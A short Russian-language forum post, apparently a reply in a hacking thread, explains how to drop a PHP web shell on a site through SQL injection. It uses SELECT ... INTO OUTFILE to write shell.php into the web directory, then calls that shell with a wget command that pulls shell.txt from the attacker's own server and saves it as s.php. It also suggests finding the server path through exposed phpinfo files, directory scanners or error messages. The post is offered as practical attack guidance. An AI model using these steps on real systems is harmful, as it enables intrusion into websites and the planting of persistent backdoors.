select '' into outfile '/path_to_web/maybe_some_dir/shell.php'. Такого файла не должно существовать, должны быть права на запись в папку. После идёшь http://site.com/maybe_some_dir/shell.php?q=wget http://yoursite.com/shell.txt -O s.php
-O s.php - переименование. Это если система линуховая и ты не можешь сделать так, чтобы .php не обрабатывался на твоём сайте. Можешь просто форму аплоада сделать со скриптом залива файла (шелла основного).
upd. "e" - двойные кавычки, чот форум одинарные ставит.
upd. если тебе надо узнать путь, то ищи(сканеры директорий и файлов в помощь) файл с phpinfo(), оч часто на сайтах лежат. Либо пробуй вызвать ошибку скрипта, и если включён их показ - увидишь путь.